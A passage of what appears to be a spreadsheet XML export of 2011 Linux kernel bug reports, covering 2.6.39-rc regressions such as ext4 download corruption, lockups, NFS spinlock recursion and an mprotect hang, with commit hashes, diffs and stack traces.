clock_gettime(CLOCK_MONOTONIC, &amp;ts); printf("SLEEP: %lu\n", ts.tv_sec); ts.tv_sec++; pthread_cond_timedwait(&amp;cv, &amp;mut, &amp;ts); clock_gettime(CLOCK_MONOTONIC, &amp;ts); printf("WAKE: %lu\n", ts.tv_sec); } return 0; }</t>
  </si>
  <si>
    <t>EXT4 causes corrupt BitTorrent downloads</t>
  </si>
  <si>
    <t>2.6.39-rc2+</t>
  </si>
  <si>
    <t>2011-04-10 13:44 UTC</t>
  </si>
  <si>
    <t>Damien Grassart</t>
  </si>
  <si>
    <t>2011-04-13 19:03 UTC</t>
  </si>
  <si>
    <t>Using the Transmission BitTorrent client (version 2.11) with the most recent kernel (2.6.39-rc2+), any torrent I try to download is corrupt. By using Transmission's "Verify Local Data" functionality, I am able to reproduce this consistently. During verification, the percent complete will reverse itself as the verification process invalidates pieces that were just downloaded. I was able to bisect the issue and track it down to this commit: commit 6de9843dab3f2a1d4d66d80aa9e5782f80977d20 Author: Feng Tang &lt;feng.tang@intel.com&gt; Date: Wed Mar 23 14:05:03 2011 -0400 ext4: remove redundant set_buffer_mapped() in ext4_da_get_block_prep() The map_bh() call will have already set the buffer_head to mapped. Signed-off-by: Feng Tang &lt;feng.tang@intel.com&gt; Signed-off-by: "Theodore Ts'o" &lt;tytso@mit.edu&gt; diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c index f44307a..dec10e2 100644 --- a/fs/ext4/inode.c +++ b/fs/ext4/inode.c @@ -2502,7 +2502,6 @@ static int ext4_da_get_block_prep(struct inode *inode, sector_t iblock, * for partial write. */ set_buffer_new(bh); - set_buffer_mapped(bh); } return 0; } I confirmed that reverting this commit makes the problem go away. Thanks, -Damien</t>
  </si>
  <si>
    <t>Kernel locks up a few minutes after boot</t>
  </si>
  <si>
    <t>2.6.29-rc2+</t>
  </si>
  <si>
    <t>2011-04-10 19:55 UTC</t>
  </si>
  <si>
    <t>2011-05-01 11:22 UTC</t>
  </si>
  <si>
    <t>A few seconds to a few minutes after the X server has started, the system locks up. Sometimes only one or two processes lock up before the system locks up entirely, sometimes the entire system locks up all at once - pressing caps lock does no longer trigger the keyboard caps lock LED. I haven't seen this behavior ever before, not even with any rc kernel. The same kernel with the same config runs fine in a virtual machine. Could this be the radeon driver that is causing trouble ? $ lspci|grep VGA 02:00.0 VGA compatible controller: ATI Technologies Inc RV610 [Radeon HD 2400 XT] kernel version: $ git show HEAD|head -n 4 commit 94c8a984ae2adbd9a9626fb42e0f2faf3e36e86f Merge: f9fa0bc 37adb89 Author: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Date: Fri Apr 8 11:47:35 2011 -0700 GRUB entry: title openSUSE 11.4 - 2.6.39-rc2+-debug root (hd0,0) kernel /boot/vmlinuz-2.6.39-rc2-debug+ root=/dev/md0 resume=/dev/md1 splash=silent showopts vga=0x31a nomodesetting initrd /boot/initrd-2.6.39-rc2-debug+</t>
  </si>
  <si>
    <t>computer restart without warning</t>
  </si>
  <si>
    <t>2.6.39-rc2</t>
  </si>
  <si>
    <t>2011-04-11 02:47 UTC</t>
  </si>
  <si>
    <t>Alexandre Demers</t>
  </si>
  <si>
    <t>2011-05-30 07:48 UTC</t>
  </si>
  <si>
    <t>Using a tri-core AMD 64bit CPU. With kernel 2.6.39-rc2, my system reboots everytime. Bisecting seems to point commit f005fe12b90c5b9fe180a09209a893e09affa8aa x86-64: Move out cleanup higmap [_brk_end, _end) out of init_memory_mapping(). I still have to test the latest git from today and also to sync to rc2 and revert that commit to confirm I'm pointing at the culprit commit. I was not having that problem with 2.6.38. I will be back soon (Monday or Tuesday) with a confirmation.</t>
  </si>
  <si>
    <t>Error "acer-wmi: Unable to detect available WMID devices" when booting</t>
  </si>
  <si>
    <t>2011-04-11 06:42 UTC</t>
  </si>
  <si>
    <t>2013-01-19 22:57 UTC</t>
  </si>
  <si>
    <t>I get this error when booting my Gateway NV5909H laptop with Linux 2.6.38: acer-wmi: Unable to detect available WMID devices If I try loading the module, I also get an error: # modprobe acer-wmi FATAL: Error inserting acer_wmi (/lib/modules/2.6.38-2-686-bigmem/kernel/drivers/platform/x86/acer-wmi.ko): No such device root@vinci:/var/www/tiki/trunk# Acer owns Gateway so it seems normal that acer-wmi would load. This error must appear since I bought this laptop, one year ago. I've been running Debian testing since, approximately from Linux 2.6.32.</t>
  </si>
  <si>
    <t>[regression] 2.6.39-rc1 - Beagleboard usbnet broken</t>
  </si>
  <si>
    <t>2011-04-11 19:33 UTC</t>
  </si>
  <si>
    <t>2011-05-14 21:59 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] 2.6.39-rc1 - Beagleboard usbnet broken Submitter : Mark Jackson &lt;mpfj-list@mimc.co.uk&gt; Date : 2011-04-04 9:22 Message-ID : 4D998DC9.3040109@mimc.co.uk References : http://marc.info/?l=linux-kernel&amp;m=130191386508831&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline. Caused by: commit 087809fce28f50098d9c3ef1a6865c722f23afd2 Author: Jamie Iles &lt;jamie@jamieiles.com&gt; Date: Fri Jan 21 14:11:52 2011 +0000 dmaengine/dw_dmac: don't scan descriptors if no xfers in progress Signed-off-by: Jamie Iles &lt;jamie.iles@picochip.com&gt; Signed-off-by: Dan Williams &lt;dan.j.williams@intel.com&gt; First-Bad-Commit : 087809fce28f50098d9c3ef1a6865c722f23afd2</t>
  </si>
  <si>
    <t>File's copied from client-&gt;linux server only copy 1st 64K data;rest is lost</t>
  </si>
  <si>
    <t>2011-04-11 22:12 UTC</t>
  </si>
  <si>
    <t>Linda Walsh</t>
  </si>
  <si>
    <t>2011-05-01 21:07 UTC</t>
  </si>
  <si>
    <t>Created attachment 54112 [details] config file I've run into a problem copying a 3.6M file from a Win7 client to the linux server via cifs. Under 2.6.38.2, it only copies the first 64K (exactly) and the client gets a write error. Using wireshark, in the success case, after the client sends the first 64K, the server response with 4 acks each advertising a Window size of ~48K, followed by an SMB packet acknowledging the first 64K, w/info: "WRITE AndX Request, 65536 bytes". In the fail case, the server responds with 4 acks, but in each of the 4 ACKS, it's advertising strange window sizes of 881, 1161, 1441 1721 and then responds with a faulty SMB packet w/info: "[TCP Retransmission] Trans2 Response&lt;unknown&gt;" Under the Trans2 section it says: Subcommand: &lt;Unknown&gt; since request packet wasn't seen. ---- I originally upgraded from 2.6.35.7 -&gt; 2.6.38.2 and encountered this prob, so successively tried the 26.35.7 config w/2.6.36, 37, 38 and finally 38.1 -- they all work. The same config on 2.6.38.2 fails as described above. Config attached.</t>
  </si>
  <si>
    <t>2.6.39-rc2 regression: X201s fails to resume b77dcf8460ae57d4eb9fd3633eb4f97b8fb20716</t>
  </si>
  <si>
    <t>2011-04-12 18:06 UTC</t>
  </si>
  <si>
    <t>2011-05-09 10:09 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.39-rc2 regression: X201s fails to resume b77dcf8460ae57d4eb9fd3633eb4f97b8fb20716 Submitter : "Keith Packard" &lt;keithp@keithp.com&gt; Date : 2011-04-06 7:44 Message-ID : yun1v1fj024.fsf@aiko.keithp.com References : http://marc.info/?l=linux-kernel&amp;m=130207593728273&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at /build/buildd/linux-2.6.38/net/wireless/scan.c:591 cfg80211_inform_bss_frame 0x1da/0x1f0 [cfg80211]()</t>
  </si>
  <si>
    <t>2.6.38-8.42</t>
  </si>
  <si>
    <t>2011-04-13 18:48 UTC</t>
  </si>
  <si>
    <t>2012-06-14 17:50 UTC</t>
  </si>
  <si>
    <t>Hello Reported just to keep track, system seems to work. - latest updates installed - window with stop sign displayed on desktop every time after full loading re kernel developed a serious problem .... - os still functional in spite of above mssge (can perform updates, use mail, browse) ProblemType: KernelOops DistroRelease: Ubuntu 11.04 Package: linux-image-2.6.38-8-generic 2.6.38-8.42 [ 52.942507] WARNING: at /build/buildd/linux-2.6.38/net/wireless/scan.c:591 cfg80211_inform_bss_frame+0x1da/0x1f0 [cfg80211]() [ 52.942509] Hardware name: GA-MA78GM-S2HP [ 52.942510] Modules linked in: binfmt_misc nls_iso8859_1 nls_cp437 vfat fat snd_hda_codec_hdmi arc4 snd_hda_codec_realtek snd_usb_audio snd_hda_intel snd_hda_codec zd1211rw ppdev mac80211 snd_pcm snd_hwdep snd_usbmidi_lib snd_seq_midi snd_rawmidi snd_seq_midi_event radeon snd_seq snd_timer psmouse snd_seq_device cfg80211 serio_raw uvcvideo videodev v4l2_compat_ioctl32 ttm snd k10temp edac_core drm_kms_helper edac_mce_amd parport_pc sp5100_tco i2c_piix4 drm xhci_hcd soundcore snd_page_alloc i2c_algo_bit lp parport usbhid hid usb_storage uas ahci floppy firewire_ohci firewire_core crc_itu_t r8169 pata_atiixp libahci [ 52.942537] Pid: 0, comm: kworker/0:1 Not tainted 2.6.38-8-generic #42-Ubuntu [ 52.942539] Call Trace: [ 52.942541] &lt;IRQ&gt; [&lt;ffffffff81065cef&gt;] ? warn_slowpath_common+0x7f/0xc0 [ 52.942548] [&lt;ffffffff81065d4a&gt;] ? warn_slowpath_null+0x1a/0x20 [ 52.942553] [&lt;ffffffffa033403a&gt;] ? cfg80211_inform_bss_frame+0x1da/0x1f0 [cfg80211] [ 52.942557] [&lt;ffffffff8144d2d6&gt;] ? ehci_qtd_alloc.clone.58+0x16/0x60 [ 52.942560] [&lt;ffffffff814377bc&gt;] ? usb_hcd_link_urb_to_ep+0x8c/0xc0 [ 52.942569] [&lt;ffffffffa038b875&gt;] ? ieee80211_bss_info_update+0x55/0x220 [mac80211] [ 52.942574] [&lt;ffffffffa038bb58&gt;] ? ieee80211_scan_rx+0x118/0x190 [mac80211] [ 52.942582] [&lt;ffffffffa03a0177&gt;] ? ieee80211_prepare_and_rx_handle+0x217/0x260 [mac80211] [ 52.942589] [&lt;ffffffffa03a035f&gt;] ? __ieee80211_rx_handle_packet+0x19f/0x300 [mac80211] [ 52.942596] [&lt;ffffffffa03a05da&gt;] ? ieee80211_rx+0x11a/0x1d0 [mac80211] [ 52.942598] [&lt;ffffffff81450944&gt;] ? ehci_irq+0x174/0x230 [ 52.942603] [&lt;ffffffffa0386c11&gt;] ? ieee80211_tasklet_handler+0xd1/0xe0 [mac80211] [ 52.942605] [&lt;ffffffff8106cc43&gt;] ? tasklet_action+0x73/0x120 [ 52.942607] [&lt;ffffffff8106d538&gt;] ? __do_softirq+0xa8/0x1c0 [ 52.942610] [&lt;ffffffff81030518&gt;] ? ack_apic_level+0x78/0x1a0 [ 52.942613] [&lt;ffffffff8100cf1c&gt;] ? call_softirq+0x1c/0x30 [ 52.942615] [&lt;ffffffff8100ea45&gt;] ? do_softirq+0x65/0xa0 [ 52.942617] [&lt;ffffffff8106d755&gt;] ? irq_exit+0x85/0x90 [ 52.942620] [&lt;ffffffff815caec6&gt;] ? do_IRQ+0x66/0xe0 [ 52.942622] [&lt;ffffffff815c3213&gt;] ? ret_from_intr+0x0/0x15 [ 52.942623] &lt;EOI&gt; [&lt;ffffffff810d975b&gt;] ? rcu_needs_cpu+0x6b/0x270 [ 52.942628] [&lt;ffffffff81037f0b&gt;] ? native_safe_halt+0xb/0x10 [ 52.942631] [&lt;ffffffff81014801&gt;] ? default_idle+0x41/0xe0 [ 52.942634] [&lt;ffffffff8100a266&gt;] ? cpu_idle+0xa6/0xf0 [ 52.942636] [&lt;ffffffff815bc743&gt;] ? start_secondary+0xbc/0xbe [ 52.942638] ---[ end trace 683bef0bfcfd6f92 ]--- Others log files in the linked Launchpad URL Thanks Fabio</t>
  </si>
  <si>
    <t>[regression 2.6.39-rc2][bisected] "perf, x86: P4 PMU - Read proper MSR register to catch" and NMIs</t>
  </si>
  <si>
    <t>2011-04-13 19:32 UTC</t>
  </si>
  <si>
    <t>2011-04-30 19:18 UTC</t>
  </si>
  <si>
    <t>Subject : [regression 2.6.39-rc2][bisected] "perf, x86: P4 PMU - Read proper MSR register to catch" and NMIs Submitter : Shaun Ruffell &lt;sruffell@digium.com&gt; Date : 2011-04-06 22:30 Message-ID : 20110406223036.GA15721@digium.com References : http://marc.info/?l=linux-kernel&amp;m=130212907032580&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline. Caused by: commit 242214f9c1eeaae40eca11e3b4d37bfce960a7cd Author: Don Zickus &lt;dzickus@redhat.com&gt; Date: Thu Mar 24 23:36:25 2011 +0300 perf, x86: P4 PMU - Read proper MSR register to catch unflagged overflows Signed-off-by: Don Zickus &lt;dzickus@redhat.com&gt; Signed-off-by: Cyrill Gorcunov &lt;gorcunov@openvz.org&gt; Cc: Lin Ming &lt;ming.m.lin@intel.com&gt; LKML-Reference: &lt;4D8BAB49.3080701@openvz.org&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 242214f9c1eeaae40eca11e3b4d37bfce960a7cd</t>
  </si>
  <si>
    <t>ACPI reboot broken on HP Compaq nx7300.</t>
  </si>
  <si>
    <t>2.6.39-rc3</t>
  </si>
  <si>
    <t>2011-04-15 14:44 UTC</t>
  </si>
  <si>
    <t>Alexey Zaytsev</t>
  </si>
  <si>
    <t>2011-05-03 18:02 UTC</t>
  </si>
  <si>
    <t>The laptop won't reboot, just hanging on Restarting system. machine reboot. Poweroff works as expected. Is there any chance to debug it without bisecting? Rc3 was the first .39 kernel I've tried, so the problem is likely also present in rc1.</t>
  </si>
  <si>
    <t>[2.6.39-rc2][bisected] Constant DISK_MEDIA_CHANGE_EVENTS from CDROM drive.</t>
  </si>
  <si>
    <t>2011-04-15 17:13 UTC</t>
  </si>
  <si>
    <t>2011-04-30 19:28 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.39-rc2][bisected] Constant DISK_MEDIA_CHANGE_EVENTS from CDROM drive. Submitter : Shaun Ruffell &lt;sruffell@digium.com&gt; Date : 2011-04-08 20:15 Message-ID : 20110408201513.GA3040@digium.com References : http://marc.info/?l=linux-kernel&amp;m=130229371907209&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ecrypts does not preserve correctly timestamps for "cp -p"</t>
  </si>
  <si>
    <t>ecryptfs</t>
  </si>
  <si>
    <t>2011-04-17 05:18 UTC</t>
  </si>
  <si>
    <t>2011-04-27 06:12 UTC</t>
  </si>
  <si>
    <t>fs_ecryptfs</t>
  </si>
  <si>
    <t>With the 2.6.39-rc3 kernel, assuming I have a file tt in a non-ecryptfs file system and I do the following: mkdir test sudo mount -t ecryptfs test test -o ecryptfs_cipher=aes,ecryptfs_key_bytes=16,ecryptfs_passthrough=n,ecryptfs_enable_filename_crypto=y cd test cp -p ../tt . then the recently-copied file 'tt' in ecrypts has its modified timestamp set to when it was copied rather than that of original file. This also happens when copying within the ecryptfs system. Strangely, it doesn't always happen immediately - the timestamp may be correct for a minute or so - so maybe there is some caching involved.</t>
  </si>
  <si>
    <t>[regression] 2.6.39-rc[1-3] fail to boot on G5 PowerMac</t>
  </si>
  <si>
    <t>2011-04-17 17:01 UTC</t>
  </si>
  <si>
    <t>2011-05-02 19:45 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] 2.6.39-rc[1-3] fail to boot on G5 PowerMac Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2011-04-12 17:30 Message-ID : 19876.35918.322649.256455@pilspetsen.it.uu.se References : http://marc.info/?l=linuxppc-embedded&amp;m=130263128523237&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING at libata-core.c:5015 in 2.6.39-rc3-wl+, then lockup.</t>
  </si>
  <si>
    <t>2011-04-17 17:37 UTC</t>
  </si>
  <si>
    <t>2011-05-14 22:06 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING at libata-core.c:5015 in 2.6.39-rc3-wl+, then lockup. Submitter : Ben Greear &lt;greearb@candelatech.com&gt; Date : 2011-04-13 16:29 Message-ID : 4DA5CF81.4070908@candelatech.com References : http://marc.info/?l=linux-kernel&amp;m=130271220809443&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[Regression,bisected] 2.6.39-rc3 ceph client write hangs</t>
  </si>
  <si>
    <t>2011-04-17 18:16 UTC</t>
  </si>
  <si>
    <t>2011-04-18 14:06 UTC</t>
  </si>
  <si>
    <t>Subject : [Regression,bisected] 2.6.39-rc3 ceph client write hangs Submitter : "Jim Schutt" &lt;jaschut@sandia.gov&gt; Date : 2011-04-15 17:00 Message-ID : 4DA879CA.8060305@sandia.gov References : http://marc.info/?l=linux-kernel&amp;m=130288689327560&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline. Caused by: commit 250df6ed274d767da844a5d9f05720b804240197 Author: Dave Chinner &lt;dchinner@redhat.com&gt; Date: Tue Mar 22 22:23:36 2011 +1100 fs: protect inode-&gt;i_state with inode-&gt;i_lock First-Bad-Commit : 250df6ed274d767da844a5d9f05720b804240197</t>
  </si>
  <si>
    <t>[BUG 2.6.39-rc3] NFS spinlock recursion</t>
  </si>
  <si>
    <t>2011-04-17 18:19 UTC</t>
  </si>
  <si>
    <t>2011-04-18 00:05 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG 2.6.39-rc3] NFS spinlock recursion Submitter : Wu Fengguang &lt;fengguang.wu@intel.com&gt; Date : 2011-04-15 2:47 Message-ID : 20110415024758.GA20420@localhost References : http://marc.info/?l=linux-kernel&amp;m=130283572008367&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>/proc/acpi/wakeup regression in 2.6.39-rc3</t>
  </si>
  <si>
    <t>2011-04-17 18:26 UTC</t>
  </si>
  <si>
    <t>2011-04-30 19:20 UTC</t>
  </si>
  <si>
    <t>Subject : /proc/acpi/wakeup regression in 2.6.39-rc3 Submitter : Tino Keitel &lt;tino.keitel@tikei.de&gt; Date : 2011-04-14 22:25 Message-ID : 20110414222525.GA24365@mac.home References : http://marc.info/?l=linux-kernel&amp;m=130282034128988&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[bug] 2.6.39-rc3 fails to boot on Alpha</t>
  </si>
  <si>
    <t>2011-04-17 18:53 UTC</t>
  </si>
  <si>
    <t>2011-05-01 22:59 UTC</t>
  </si>
  <si>
    <t>Subject : [bug] 2.6.39-rc3 fails to boot on Alpha Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2011-04-17 15:13 Message-ID : 19883.912.266127.538215@pilspetsen.it.uu.se References : http://marc.info/?l=linux-kernel&amp;m=130305321212360&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mprotect got stuck when THP is "always" enabled</t>
  </si>
  <si>
    <t>2011-04-19 05:25 UTC</t>
  </si>
  <si>
    <t>Caspar Zhang</t>
  </si>
  <si>
    <t>2012-06-13 15:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 54662 [details] mprotect test program Description of problem: see attached test program. This program can be run like this: ./mprotect &lt;times&gt; &lt;length&gt; &lt;flag&gt; times: how many times the mprotect() function execute; length: same as the "length" option in mprotect() function; flag: when flag is set to 1, the program would touch every page within the range [addr, addr+length-1] before it calls mprotect(). to reproduce the stuck, execute: ./mprotect 50 128 1 Note that the stuck only happens when the following conditions are all satisfied: flag == 1, i.e. touch page before mprotect() proto = PROT_NONE in mprotect() THP is enabled with "always" option Version-Release number of selected component (if applicable): Linux version 2.6.39-rc3 (caspar@caspar-gentoo) (gcc version 4.5.2 (Gentoo 4.5.2 p1.0, pie-0.4.5) ) #1 SMP Tue Apr 19 12:32:20 CST 2011 How reproducible: very often Actual results: test program got stuck when touching pages + THP always enabled: caspar-gentoo tmp # echo always &gt; /sys/kernel/mm/transparent_hugepage/enabled caspar-gentoo tmp # ./mprotect 50 128 1 ^C &lt;- stuck caspar-gentoo tmp # ./mprotect 50 128 1 ^C caspar-gentoo tmp # ./mprotect 50 128 1 ^C caspar-gentoo tmp # ./mprotect 50 128 1 ^C caspar-gentoo tmp # echo madvise &gt; /sys/kernel/mm/transparent_hugepage/enabled caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # echo never &gt; /sys/kernel/mm/transparent_hugepage/enabled caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 done caspar-gentoo tmp # ./mprotect 50 128 1 Expected results: test program exit normally Additional info: This reproducer was similar to a test program in upstream test suite: libMicro (http://hub.opensolaris.org/bin/view/Project+libmicro/) strace ouput: # strace ./mprotect 50 128 1 execve("./mprotect", ["./mprotect", "50", "128", "1"], [/* 35 vars */]) = 0 brk(0) = 0x16ad000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffa0c266000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=163815, ...}) = 0 mmap(NULL, 163815, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffa0c23e000 close(3) = 0 open("/lib64/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0\320\357\1\0\0\0\0\0"..., 832) = 832 fstat(3, {st_mode=S_IFREG|0755, st_size=1608912, ...}) = 0 mmap(NULL, 3718152, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffa0bcbc000 mprotect(0x7ffa0be3f000, 2093056, PROT_NONE) = 0 mmap(0x7ffa0c03e000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x182000) = 0x7ffa0c03e000 mmap(0x7ffa0c043000, 19464, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffa0c043000 close(3) = 0 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffa0c23d000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffa0c23c000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffa0c23b000 arch_prctl(ARCH_SET_FS, 0x7ffa0c23c700) = 0 mprotect(0x7ffa0c03e000, 16384, PROT_READ) = 0 mprotect(0x600000, 4096, PROT_READ) = 0 mprotect(0x7ffa0c267000, 4096, PROT_READ) = 0 munmap(0x7ffa0c23e000, 163815) = 0 open("/dev/zero", O_RDWR) = 3 mmap(NULL, 6553600, PROT_READ|PROT_WRITE, MAP_PRIVATE, 3, 0) = 0x7ffa0b67c000 mprotect(0x7ffa0b67c000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b69c000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b6bc000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b6dc000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b6fc000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b71c000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b73c000, 131072, PROT_NONE) = 0 mprotect(0x7ffa0b75c000, 131072, PROT_NONE) = 0 &lt;repeated random times, snip&gt;</t>
  </si>
  <si>
    <t>Hppfs fails to build with randconfig</t>
  </si>
  <si>
    <t>2.6.39-rc4</t>
  </si>
  <si>
    <t>2011-04-19 07:13 UTC</t>
  </si>
  <si>
    <t>Simon Danner</t>
  </si>
  <si>
    <t>2012-05-12 14:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 54682 [details] randconfig that fails Hppfs fails to build with attached config. Reverting 0ceeca5a08abb1d880f0cc0ea812ad14932070e0 fixes it.</t>
  </si>
  <si>
    <t>s16 negative battery current quirk required for Atom-based tablet PC</t>
  </si>
  <si>
    <t>2.6.38.3</t>
  </si>
  <si>
    <t>2011-04-19 08:47 UTC</t>
  </si>
  <si>
    <t>2011-08-30 01:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 54692 [details] acpidump for this tablet My Atom tablet PC reports ludicrous values for /sys/class/power_supply/BAT0/current_now on AC power (65336000 µA, if I recall the number correctly). This leads to gnome-power-manager claiming that the machine has only 3 minutes of power left when first unplugged. Commenting out 'dmi_name_in_vendors("Acer") &amp;&amp;' in acpi_battery_quirks() in drivers/acpi/battery.c to force the quirk results in more sane current_now values (around 200000) when on AC. dmidecode and acpidump attached.</t>
  </si>
  <si>
    <t>Small strlen</t>
  </si>
  <si>
    <t>2011-04-19 20:27 UTC</t>
  </si>
  <si>
    <t>2012-07-14 15:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 54732 [details] Strlen fix The word "enable" contains six characters, (strlen ("enable") -1), equal to five. The word "disable" has seven characters, (strlen ("disable")-1), equal to six. Perhaps the author confused with sizeof?!</t>
  </si>
  <si>
    <t>list_del corruption in sd driver since 2.6.39-rc4</t>
  </si>
  <si>
    <t>2011-04-21 21:10 UTC</t>
  </si>
  <si>
    <t>2011-05-15 13:09 UTC</t>
  </si>
  <si>
    <t>Acer Aspire 1511LMi Athlon 64 3GHz in 64bits mode Slackware64 13.1 PREEMPT+slub+kmemcheck I've just got (once, very difficult to reproduce) the following warning at boot on -rc4 with kmemcheck and list check debugging options: Intel ICH 0000:00:06.0: PCI INT A -&gt; Link[LACI] -&gt; GSI 22 (level, low) -&gt; IRQ 22 Intel ICH 0000:00:06.0: setting latency timer to 64 firewire_net: firewire0: IPv4 over FireWire on device 00c09f000019adc5 firewire_core: refreshed device fw0 scsi 2:0:0:0: Direct-Access Generic Flash R/W 2002 PQ: 0 ANSI: 2 intel8x0_measure_ac97_clock: measured 52049 usecs (2528 samples) intel8x0: clocking to 47437 sd 2:0:0:0: Attached scsi generic sg2 type 0 ------------[ cut here ]------------ WARNING: at lib/kref.c:34 kref_get+0x2c/0x30() Hardware name: Aspire 1510 Modules linked in: Pid: 310, comm: kworker/0:1 Not tainted 2.6.39-rc4 #5 Call Trace: [&lt;ffffffff810379ea&gt;] warn_slowpath_common+0x7a/0xb0 [&lt;ffffffff81037a35&gt;] warn_slowpath_null+0x15/0x20 [&lt;ffffffff8125bffc&gt;] kref_get+0x2c/0x30 [&lt;ffffffff8125ac9a&gt;] kobject_get+0x1a/0x30 [&lt;ffffffff812ec704&gt;] get_device+0x14/0x20 [&lt;ffffffff81307a47&gt;] scsi_request_fn+0x37/0x4e0 [&lt;ffffffff812470d0&gt;] __blk_run_queue+0x30/0x60 [&lt;ffffffff81248f14&gt;] blk_delay_work+0x24/0x40 [&lt;ffffffff810507d1&gt;] process_one_work+0x1a1/0x440 [&lt;ffffffff81050771&gt;] ? process_one_work+0x141/0x440 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff81248ef0&gt;] ? blk_requeue_request+0x60/0x60 [&lt;ffffffff81050f15&gt;] worker_thread+0x2a5/0x380 [&lt;ffffffff81050c70&gt;] ? rescuer_thread+0x200/0x200 [&lt;ffffffff810550be&gt;] kthread+0xae/0xc0 [&lt;ffffffff81067675&gt;] ? trace_hardirqs_on_caller+0x135/0x180 [&lt;ffffffff815e8a34&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff810335ec&gt;] ? T.1044+0x7c/0xd0 [&lt;ffffffff815e7682&gt;] ? retint_restore_args+0xe/0xe [&lt;ffffffff81055010&gt;] ? __init_kthread_worker+0x70/0x70 [&lt;ffffffff815e8a30&gt;] ? gs_change+0xb/0xb ---[ end trace cee58f33c54e791a ]--- sd 2:0:0:0: [sdb] Attached SCSI removable disk ------------[ cut here ]------------ WARNING: at lib/list_debug.c:47 __list_del_entry+0x63/0xd0() Hardware name: Aspire 1510 list_del corruption, ffff88001d73a010-&gt;next is LIST_POISON1 (dead000000100100) Modules linked in: Pid: 310, comm: kworker/0:1 Tainted: G W 2.6.39-rc4 #5 Call Trace: [&lt;ffffffff810379ea&gt;] warn_slowpath_common+0x7a/0xb0 [&lt;ffffffff81037ac1&gt;] warn_slowpath_fmt+0x41/0x50 [&lt;ffffffff81269b83&gt;] __list_del_entry+0x63/0xd0 [&lt;ffffffff81269c01&gt;] list_del+0x11/0x40 [&lt;ffffffff8130ce4d&gt;] scsi_device_dev_release_usercontext+0x4d/0x140 [&lt;ffffffff815e7ae9&gt;] ? error_exit+0x29/0xb0 [&lt;ffffffff8130ce00&gt;] ? scsi_device_cls_release+0x20/0x20 [&lt;ffffffff810504e6&gt;] execute_in_process_context+0x86/0x90 [&lt;ffffffff8130cdd7&gt;] scsi_device_dev_release+0x17/0x20 [&lt;ffffffff812ecdf2&gt;] device_release+0x22/0x90 [&lt;ffffffff8125ac37&gt;] kobject_release+0x47/0x90 [&lt;ffffffff8125abf0&gt;] ? kobject_del+0x40/0x40 [&lt;ffffffff8125bf96&gt;] kref_put+0x36/0x70 